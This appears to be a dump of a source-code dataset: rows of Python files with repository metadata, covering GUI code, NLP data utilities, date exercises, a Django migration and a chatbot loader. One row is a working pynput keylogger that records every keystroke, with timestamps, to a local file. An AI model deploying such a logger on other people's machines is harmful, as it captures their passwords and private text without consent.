repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
iosetek/CommandRecognition | 16,552,803,984,647 | b6a635c3cdbf64a5d8535ede2292b8403ea39149 | 8e79d1a368e99b1cb44d232703839fe2542c21d8 | /src/gui/test.py | 899f4e628b88ee8b789b28ca8a498a20b4362fd0 | [
"MIT"
]
| permissive | https://github.com/iosetek/CommandRecognition | ab233063fd1ccf2e81d96d5ccd1cb1a30ea8f236 | 56a58b44bdc4d54feafc955c17dd0ff236486cae | refs/heads/master | 2020-05-01T12:09:22.236993 | 2019-09-03T00:26:34 | 2019-09-03T00:26:34 | 177,459,249 | 0 | 0 | MIT | false | 2019-08-07T23:18:41 | 2019-03-24T19:26:55 | 2019-05-02T12:05:20 | 2019-08-07T23:18:41 | 396 | 0 | 0 | 0 | Python | false | false | from src.api import Api
from src.gui.appJar.appjar import gui
class TestUI:
def __init__(self, app):
self.__app = app
self.__isRecording = False
self.__RECORD_BUTTON_NAME = "TEST_START_STOP_RECORD_BUTTON"
self.__USE_ACTION_CHECKBOX_NAME = "TEST_USE_ACTION_CHECKBOX"
def append_its_content(self):
"""
Creates view designed for testing command recognition
ability of current application. It allows user to record
it's own voice and informs if any command was detected.
It can be also used to check if action for current command
works properly.
"""
self.__add_recording_button()
self.__app.addNamedCheckBox("USE \nACTION", self.__USE_ACTION_CHECKBOX_NAME)
print("TODO")
def __add_recording_button(self):
self.__app.addImageButton(
self.__RECORD_BUTTON_NAME,
self.__record_button_pressed,
"src/gui/gfx/button_record_start.gif")
def __record_button_pressed(self):
if self.__isRecording:
self.__isRecording = False
self.__app.setButtonImage(self.__RECORD_BUTTON_NAME, "src/gui/gfx/button_record_start.gif")
Api.stop_recording()
else:
self.__isRecording = True
self.__app.setButtonImage(self.__RECORD_BUTTON_NAME, "src/gui/gfx/button_record_stop.gif")
Api.start_recording()
| UTF-8 | Python | false | false | 1,447 | py | 43 | test.py | 37 | 0.609537 | 0.609537 | 0 | 37 | 37.891892 | 103 |
artidoro/hate-speech-detection | 3,461,743,676,683 | 26405347bf9849605897b78d21737a55f3eae0a2 | 9295f1f774e63dff47951c52a5a60ef8dab07239 | /hate_speach_utils.py | 399a953fe1d8c4fa27ce9cba23f25070f715e7d4 | []
| no_license | https://github.com/artidoro/hate-speech-detection | a718fdb1ca4c81520aa1d5161b459569d793461d | 78923e3fc2243b6d77be56d98a95a262797e2bd5 | refs/heads/master | 2021-02-14T02:44:58.017139 | 2020-03-06T03:39:41 | 2020-03-06T03:39:41 | 244,759,525 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torchtext
from torchtext import data
from torchtext.vocab import Vectors, GloVe
import os
from tqdm import tqdm
from datetime import datetime
import logging
import pprint
import io
from transformers import RobertaTokenizer
from tokenizers import CharBPETokenizer
import numpy as np
from sklearn.metrics import f1_score, confusion_matrix
def get_average_embedding(vector_map):
"""
From the dictionary of embeddings gets the average out.
"""
embeds = torch.cat(list(map(lambda x: x.view(1, -1), vector_map.values())), 0)
return torch.mean(embeds, 0)
def load_vectors(fname, train_vocab, device):
"""
Modified from https://fasttext.cc/docs/en/english-vectors.html.
This loads fasttext vectors for words that have been encountered in the
vocabulary `train_vocab`.
We also build a string to inter map to get inter index for the words.
"""
fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
data = {}
stoi = {}
loaded_vectors = 0
words = {word.lower().strip() for word in train_vocab.freqs}
for idx, line in tqdm(enumerate(fin)):
tokens = line.rstrip().split(' ')
if tokens[0] in words:
stoi[tokens[0]] = idx
data[idx] = torch.tensor(list(map(float, tokens[1:])), device=device)
loaded_vectors += 1
logger = logging.getLogger('logger')
logger.info('Number of vectors loaded from fasttext {}'.format(loaded_vectors))
return data, stoi
def torchtext_iterators(args):
"""
Builds torchtext iterators from the files.
"""
logger = logging.getLogger('logger')
logger.info('Starting to load data and create iterators.')
# Tokenizer.
if args['model_name'] == 'roberta':
tokenizer = lambda x : [x]
elif args['subword']:
tokenizer = 'subword'
elif args['bpe']:
bpe_tokenizer = CharBPETokenizer('log/bpe-trained-vocab.json', 'log/bpe-trained-merges.txt')
tokenizer = lambda x : bpe_tokenizer.encode(x).tokens
else:
tokenizer = None
# `sequential` does not tokenize the label.
label = data.Field(batch_first=True, sequential=False)
text = data.Field(batch_first=True, lower=True, tokenize=tokenizer)
fields = [('text', text), ('label', label)]
train = data.TabularDataset(args['train_path'], 'tsv', fields, skip_header=True)
valid = data.TabularDataset(args['valid_path'], 'tsv', fields, skip_header=True)
test = data.TabularDataset(args['test_path'], 'tsv', [('text', text)], skip_header=True)
text.build_vocab(train, min_freq=args['min_freq'])
label.build_vocab(train)
train_iter, valid_iter, test_iter = torchtext.data.BucketIterator.splits(
(train, valid, test), batch_size=args['batch_size'], repeat=False,
device=torch.device(args['device']), sort=False,
sort_within_batch=False)
if not args['no_pretrained_vectors']:
if not args['load_vectors_manually']:
logger.info('Starting to load vectors from Glove.')
text.vocab.load_vectors(vectors=GloVe(name='6B'))
else:
logger.info('Starting to manually load vectors from FastText.')
vector_map, stoi = load_vectors(args['fasttext_path'], text.vocab, torch.device(args['device']))
average_embed = get_average_embedding(vector_map)
text.vocab.set_vectors(stoi, vector_map, 300, unk_init=lambda x: average_embed.clone())
text.vocab.vectors[text.vocab.stoi['<unk>']] = average_embed.clone()
logger.info('Built train vocabulary of {} words'.format(len(text.vocab)))
return train_iter, valid_iter, test_iter, text, label
def predict_write_to_file(module, val_iter, args):
mode = module.training
module.eval()
predictions = []
for batch in tqdm(val_iter):
scores = module.forward(batch.text)
preds = scores.argmax(1).squeeze()
predictions += list(preds.cpu().numpy())
# Write predictions to file.
with open(os.path.join('log', args['checkpoint_path'], 'test_results.txt'), 'w') as out_file:
for pred in predictions:
out_file.write(args['LABEL'].vocab.itos[pred] + '\n')
module.train(mode)
| UTF-8 | Python | false | false | 4,288 | py | 4 | hate_speach_utils.py | 2 | 0.654151 | 0.65042 | 0 | 110 | 37.981818 | 108 |
prabhatmalhan/Computer_Tools | 2,972,117,403,603 | 8e33750c6d7530b05c467fe2a90e78af7b936e01 | e466198ac69dd031428fd0018f4b7f729da28e17 | /Keylogger/keylogger.py | 05f387be127f47915a0f4e96ad3ec90fcf6e7111 | [
"Unlicense"
]
| permissive | https://github.com/prabhatmalhan/Computer_Tools | 93cf6e241796ba138dd200a8eb6cbb98a65adfad | 4ec90381ff23684f602a6b92cecd2c25cfcc43cb | refs/heads/master | 2023-01-05T02:40:16.941234 | 2020-11-05T03:13:15 | 2020-11-05T03:13:15 | 268,194,610 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
try:
from os import system as syst
except:
syst('pip install pynput')
syst('cls')
try:
from os import system as syst
except:
sys.exit()
try:
from pynput.keyboard import Key, Listener
except:
syst('pip install pynput')
syst('cls')
try:
from pynput.keyboard import Key, Listener
except:
sys.exit()
import logging
logging.basicConfig(filename='keystroke' , level = logging.DEBUG , format = '%(asctime)s : %(message)s')
def on_press(key) :
logging.info('\t'+str(key))
def on_release(key) :
logging.info('\t'*4+str(key))
if key == Key.esc :
return False
with Listener(on_press=on_press,on_release=on_release) as listener :
listener.join()
| UTF-8 | Python | false | false | 677 | py | 4 | keylogger.py | 3 | 0.695716 | 0.694239 | 0 | 37 | 17.297297 | 104 |
PreFX48/colorization_project | 12,506,944,804,027 | a6a504b3832079542ba482f8c1b29aa1fff7ff70 | d3fa08a938f0ad4375875412f2a3706205f05067 | /colorize/form.py | 442e5a4283fe0e93f50556827397bcca7e16077f | []
| no_license | https://github.com/PreFX48/colorization_project | 6848656999d2d52d7c3d506933702146744a5ae3 | 138aa3cbaf3f4b59e8fcdae36570f0cc5c67056a | refs/heads/main | 2023-04-01T23:31:04.904012 | 2021-03-20T14:43:32 | 2021-03-20T14:43:32 | 349,738,450 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'form.ui'
#
# Created by: PyQt5 UI code generator 5.15.3
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1200, 800)
self.horizontalLayoutWidget = QtWidgets.QWidget(MainWindow)
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout.setContentsMargins(0, 10, 10, 5)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_3.setObjectName("label_3")
self.horizontalLayout_2.addWidget(self.label_3)
self.raw_folder_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.raw_folder_input.setText("")
self.raw_folder_input.setObjectName("raw_folder_input")
self.horizontalLayout_2.addWidget(self.raw_folder_input)
self.raw_folder_dialog_button = QtWidgets.QToolButton(self.horizontalLayoutWidget)
self.raw_folder_dialog_button.setObjectName("raw_folder_dialog_button")
self.horizontalLayout_2.addWidget(self.raw_folder_dialog_button)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
self.horizontalLayout_8.setObjectName("horizontalLayout_8")
self.prev_image_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.prev_image_button.setObjectName("prev_image_button")
self.horizontalLayout_8.addWidget(self.prev_image_button)
self.current_image_label = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.current_image_label.setAlignment(QtCore.Qt.AlignCenter)
self.current_image_label.setObjectName("current_image_label")
self.horizontalLayout_8.addWidget(self.current_image_label)
self.next_image_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.next_image_button.setObjectName("next_image_button")
self.horizontalLayout_8.addWidget(self.next_image_button)
self.horizontalLayout_8.setStretch(1, 1)
self.verticalLayout.addLayout(self.horizontalLayout_8)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.colorpicker_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.colorpicker_mode_button.sizePolicy().hasHeightForWidth())
self.colorpicker_mode_button.setSizePolicy(sizePolicy)
self.colorpicker_mode_button.setObjectName("colorpicker_mode_button")
self.gridLayout.addWidget(self.colorpicker_mode_button, 0, 1, 1, 1)
self.pushButton_6 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_6.sizePolicy().hasHeightForWidth())
self.pushButton_6.setSizePolicy(sizePolicy)
self.pushButton_6.setCheckable(False)
self.pushButton_6.setFlat(True)
self.pushButton_6.setObjectName("pushButton_6")
self.gridLayout.addWidget(self.pushButton_6, 0, 2, 1, 1)
self.fill_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.fill_mode_button.sizePolicy().hasHeightForWidth())
self.fill_mode_button.setSizePolicy(sizePolicy)
self.fill_mode_button.setObjectName("fill_mode_button")
self.gridLayout.addWidget(self.fill_mode_button, 1, 1, 1, 1)
self.pushButton_5 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.pushButton_5.setFlat(True)
self.pushButton_5.setObjectName("pushButton_5")
self.gridLayout.addWidget(self.pushButton_5, 1, 3, 1, 1)
self.pushButton_7 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_7.sizePolicy().hasHeightForWidth())
self.pushButton_7.setSizePolicy(sizePolicy)
self.pushButton_7.setFlat(True)
self.pushButton_7.setObjectName("pushButton_7")
self.gridLayout.addWidget(self.pushButton_7, 1, 2, 1, 1)
self.pushButton_4 = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_4.sizePolicy().hasHeightForWidth())
self.pushButton_4.setSizePolicy(sizePolicy)
self.pushButton_4.setFlat(True)
self.pushButton_4.setObjectName("pushButton_4")
self.gridLayout.addWidget(self.pushButton_4, 0, 3, 1, 1)
self.brush_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.brush_mode_button.sizePolicy().hasHeightForWidth())
self.brush_mode_button.setSizePolicy(sizePolicy)
self.brush_mode_button.setObjectName("brush_mode_button")
self.gridLayout.addWidget(self.brush_mode_button, 0, 0, 1, 1)
self.eraser_mode_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.eraser_mode_button.sizePolicy().hasHeightForWidth())
self.eraser_mode_button.setSizePolicy(sizePolicy)
self.eraser_mode_button.setObjectName("eraser_mode_button")
self.gridLayout.addWidget(self.eraser_mode_button, 1, 0, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.palette = Palette(self.horizontalLayoutWidget)
self.palette.setMinimumSize(QtCore.QSize(50, 50))
self.palette.setObjectName("palette")
self.verticalLayout.addWidget(self.palette)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.brush_opacity_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_opacity_input.setObjectName("brush_opacity_input")
self.gridLayout_2.addWidget(self.brush_opacity_input, 1, 2, 1, 1)
self.brush_size_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_size_slider.setMinimum(1)
self.brush_size_slider.setMaximum(50)
self.brush_size_slider.setProperty("value", 10)
self.brush_size_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_size_slider.setObjectName("brush_size_slider")
self.gridLayout_2.addWidget(self.brush_size_slider, 0, 1, 1, 1)
self.brush_opacity_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_opacity_slider.setMaximum(100)
self.brush_opacity_slider.setProperty("value", 100)
self.brush_opacity_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_opacity_slider.setObjectName("brush_opacity_slider")
self.gridLayout_2.addWidget(self.brush_opacity_slider, 1, 1, 1, 1)
self.brush_hardness_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_hardness_input.setObjectName("brush_hardness_input")
self.gridLayout_2.addWidget(self.brush_hardness_input, 2, 2, 1, 1)
self.label_6 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_6.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_6.setObjectName("label_6")
self.gridLayout_2.addWidget(self.label_6, 2, 0, 1, 1)
self.label_5 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_5.setObjectName("label_5")
self.gridLayout_2.addWidget(self.label_5, 1, 0, 1, 1)
self.brush_hardness_slider = QtWidgets.QSlider(self.horizontalLayoutWidget)
self.brush_hardness_slider.setMinimum(1)
self.brush_hardness_slider.setMaximum(100)
self.brush_hardness_slider.setProperty("value", 90)
self.brush_hardness_slider.setOrientation(QtCore.Qt.Horizontal)
self.brush_hardness_slider.setObjectName("brush_hardness_slider")
self.gridLayout_2.addWidget(self.brush_hardness_slider, 2, 1, 1, 1)
self.label_4 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_4.setObjectName("label_4")
self.gridLayout_2.addWidget(self.label_4, 0, 0, 1, 1)
self.brush_size_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.brush_size_input.setObjectName("brush_size_input")
self.gridLayout_2.addWidget(self.brush_size_input, 0, 2, 1, 1)
self.gridLayout_2.setColumnMinimumWidth(1, 100)
self.gridLayout_2.setColumnStretch(1, 1)
self.verticalLayout.addLayout(self.gridLayout_2)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.label_8 = QtWidgets.QLabel(self.horizontalLayoutWidget)
self.label_8.setObjectName("label_8")
self.horizontalLayout_7.addWidget(self.label_8)
self.save_folder_input = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
self.save_folder_input.setText("")
self.save_folder_input.setObjectName("save_folder_input")
self.horizontalLayout_7.addWidget(self.save_folder_input)
self.save_folder_dialog_button = QtWidgets.QToolButton(self.horizontalLayoutWidget)
self.save_folder_dialog_button.setObjectName("save_folder_dialog_button")
self.horizontalLayout_7.addWidget(self.save_folder_dialog_button)
self.verticalLayout.addLayout(self.horizontalLayout_7)
self.save_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.save_button.setFlat(False)
self.save_button.setObjectName("save_button")
self.verticalLayout.addWidget(self.save_button)
self.horizontalLayout.addLayout(self.verticalLayout)
self.raw_image = Canvas(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.raw_image.sizePolicy().hasHeightForWidth())
self.raw_image.setSizePolicy(sizePolicy)
self.raw_image.setMinimumSize(QtCore.QSize(100, 100))
self.raw_image.setAlignment(QtCore.Qt.AlignCenter)
self.raw_image.setObjectName("raw_image")
self.horizontalLayout.addWidget(self.raw_image)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.colorize_button = QtWidgets.QPushButton(self.horizontalLayoutWidget)
self.colorize_button.setObjectName("colorize_button")
self.verticalLayout_3.addWidget(self.colorize_button)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.colorized_image = Canvas(self.horizontalLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.colorized_image.sizePolicy().hasHeightForWidth())
self.colorized_image.setSizePolicy(sizePolicy)
self.colorized_image.setMinimumSize(QtCore.QSize(100, 100))
self.colorized_image.setAlignment(QtCore.Qt.AlignCenter)
self.colorized_image.setObjectName("colorized_image")
self.horizontalLayout.addWidget(self.colorized_image)
self.horizontalLayout.setStretch(0, 5)
self.horizontalLayout.setStretch(1, 7)
self.horizontalLayout.setStretch(3, 7)
MainWindow.setCentralWidget(self.horizontalLayoutWidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_3.setText(_translate("MainWindow", "Folder"))
self.raw_folder_dialog_button.setText(_translate("MainWindow", "..."))
self.prev_image_button.setText(_translate("MainWindow", "<"))
self.current_image_label.setText(_translate("MainWindow", "image_sample.png"))
self.next_image_button.setText(_translate("MainWindow", ">"))
self.colorpicker_mode_button.setText(_translate("MainWindow", "CP"))
self.pushButton_6.setText(_translate("MainWindow", "C"))
self.fill_mode_button.setText(_translate("MainWindow", "Fill"))
self.pushButton_5.setText(_translate("MainWindow", "H"))
self.pushButton_7.setText(_translate("MainWindow", "G"))
self.pushButton_4.setText(_translate("MainWindow", "D"))
self.brush_mode_button.setText(_translate("MainWindow", "Br"))
self.eraser_mode_button.setText(_translate("MainWindow", "Eras"))
self.brush_opacity_input.setText(_translate("MainWindow", "100"))
self.brush_hardness_input.setText(_translate("MainWindow", "90"))
self.label_6.setText(_translate("MainWindow", "Hardness"))
self.label_5.setText(_translate("MainWindow", "Opacity"))
self.label_4.setText(_translate("MainWindow", "Size"))
self.brush_size_input.setText(_translate("MainWindow", "10"))
self.label_8.setText(_translate("MainWindow", "Folder"))
self.save_folder_dialog_button.setText(_translate("MainWindow", "..."))
self.save_button.setText(_translate("MainWindow", "SAVE"))
self.raw_image.setText(_translate("MainWindow", "raw_image"))
self.colorize_button.setText(_translate("MainWindow", "->"))
self.colorized_image.setText(_translate("MainWindow", "colorized_image"))
from canvas import Canvas
from palette import Palette
| UTF-8 | Python | false | false | 16,033 | py | 19 | form.py | 15 | 0.724755 | 0.707853 | 0 | 256 | 61.628906 | 114 |
liltong97/dsp | 7,413,113,573,585 | 5ef0eaed2c89a28b0810712aa3404fe7eaa3da90 | 15ab89c068c1ec6976c3b188e0fcafd058a30f2e | /python/q5_datetime.py | 18e10ee9cff4c71e4e6b79c639e8e4ce93f5e670 | []
| no_license | https://github.com/liltong97/dsp | 70785fb61e9a2bd7e2caa8a8ed3893076127260e | 9d489412c02c887e3ebe1ab4d17bff7f7836e424 | refs/heads/master | 2021-01-13T15:03:13.378163 | 2017-01-12T21:22:24 | 2017-01-12T21:22:24 | 76,284,152 | 1 | 0 | null | true | 2016-12-12T18:32:32 | 2016-12-12T18:32:32 | 2016-12-09T19:38:34 | 2016-12-05T18:51:00 | 2,681 | 0 | 0 | 0 | null | null | null | # Hint: use Google to find python function
from datetime import date
####a)
date_start = '01-02-2013'
date_stop = '07-28-2015'
def find_days_dashes(date_start, date_stop):
start_array = map(int, date_start.split('-'))
stop_array = map(int, date_stop.split('-'))
d0 = date(start_array[2], start_array[0], start_array[1])
d1 = date(stop_array[2], stop_array[0], stop_array[1])
delta = d1-d0
return delta.days
print find_days_dashes(date_start, date_stop)
####b)
date_start = '12312013'
date_stop = '05282015'
def find_days_nodashes(date_start, date_stop):
d0 = date(int(date_start[4:]), int(date_start[0:2]), int(date_start[2:4]))
d1 = date(int(date_stop[4:]), int(date_stop[0:2]), int(date_stop[2:4]))
delta = d1-d0
return delta.days
print find_days_nodashes(date_start, date_stop)
####c)
date_start = '15-Jan-1994'
date_stop = '14-Jul-2015'
def find_days_words(date_start, date_stop):
start_array = date_start.split('-')
stop_array = date_stop.split('-')
d = {'Jan' : 1, 'Jul': 7}
d0 = date(int(start_array[2]), d[start_array[1]], int(start_array[0]))
d1 = date(int(stop_array[2]), d[stop_array[1]], int(stop_array[0]))
delta = d1-d0
return delta.days
print find_days_words(date_start, date_stop)
| UTF-8 | Python | false | false | 1,270 | py | 12 | q5_datetime.py | 6 | 0.638583 | 0.575591 | 0 | 37 | 33.324324 | 78 |
telminov/ansible-manager | 13,554,916,797,729 | ee5a42c91d6c91a1bbac7a1b482473087a29cb3d | 9ab4af46e9a35519e16d8ea52337e4ca908e3bfa | /core/migrations/0013_auto_20170705_1453.py | e61511423a84f6feef28a4c4b6f213dfc9169f07 | [
"MIT"
]
| permissive | https://github.com/telminov/ansible-manager | 11a78417afbe9a0b4ee995c00b91e19b71905325 | 05222c469f31ebab3d35dce127c4687bdd8e86e1 | refs/heads/master | 2021-01-22T20:39:59.366634 | 2018-10-30T13:22:01 | 2018-10-30T13:22:01 | 85,341,950 | 13 | 7 | MIT | false | 2020-07-03T08:16:39 | 2017-03-17T18:14:17 | 2020-02-15T03:42:28 | 2018-10-30T13:22:02 | 268 | 12 | 3 | 4 | Python | false | false | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-07-05 11:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0012_auto_20170623_1113'),
]
operations = [
migrations.CreateModel(
name='RepeatSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pause', models.IntegerField(help_text='Time in minutes')),
('template', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='repeat_settings', to='core.TaskTemplate')),
],
),
migrations.RenameField(
model_name='task',
old_name='is_cron_created',
new_name='is_automatically_created',
),
migrations.AddField(
model_name='task',
name='repeat_number',
field=models.IntegerField(default=0),
),
]
| UTF-8 | Python | false | false | 1,101 | py | 86 | 0013_auto_20170705_1453.py | 57 | 0.584015 | 0.553134 | 0 | 34 | 31.382353 | 149 |
r06922085/chatbot | 15,135,464,760,601 | 2cc780aa9a15aca53f43738f7b03b58378ef4be6 | 33fad982daddff9eea25baabdf2ab2807d7ffe1e | /utils/dataManager.py | 9f2c88184fccc064a2719a282060e3e902ac9b70 | []
| no_license | https://github.com/r06922085/chatbot | 56ee70ee6ee6e8a65d385825cbb6788699bf17bb | b2772c0ae9b0968813bae702cbd902d5e35877d1 | HEAD | 2018-11-06T01:20:12.287195 | 2018-08-27T09:02:19 | 2018-08-27T09:02:19 | 144,441,660 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import json
import pickle
import json
PAD = '<PAD>' # index 0
BOS = '<BOS>' # index 1
EOS = '<EOS>' # index 2
UNK = '<UNK>' # index 3
class DataManager():
raw_data = None
whole_data = None
train_data = None
train_label = None
clean_train_label = None
#word_list
word_list = [PAD, BOS, EOS, UNK]
word_list_final = [PAD, BOS, EOS, UNK]
dictionary = []
times = [0,0,0,0]
voc_size = 4
max_len = 0
file_name = ''
# data used for training
train_x = []
train_y = []
def __init__(self, max_len, file_name = 'utils/data/clr_conversation.txt'):
self.max_len = max_len
self.file_name = file_name
do = "nothing"
def getTrainData(self):
self.get_word_list_final_from_word_list_file()
self.read_npy_train_data()
return self.voc_size,self.train_x,self.train_y,self.word_list_final
def getTestData(self):
word_list = self.get_word_list_final_from_word_list_file()
voc_size = self.get_voc_size(word_list)
return voc_size, word_list
def LoadData(self, file_name = 'utils/data/clr_conversation.txt'):
# data, label
train_data = []
train_label = []
whole_data = []
# load file id
with open(file_name, 'r', encoding = 'utf8',errors='ignore') as f:
#f.encoding = 'utf8'
train_sentences = f.read().split('\n')
for i in range(len(train_sentences)-1):
#print(train_sentences[i])
if train_sentences[i] != '+++$+++' and train_sentences[i+1] != '+++$+++':
train_data.append(train_sentences[i].split())
train_label.append(train_sentences[i+1].split())
whole_data = [] + train_data#[] is to not to let the train_data address point to whole_data address
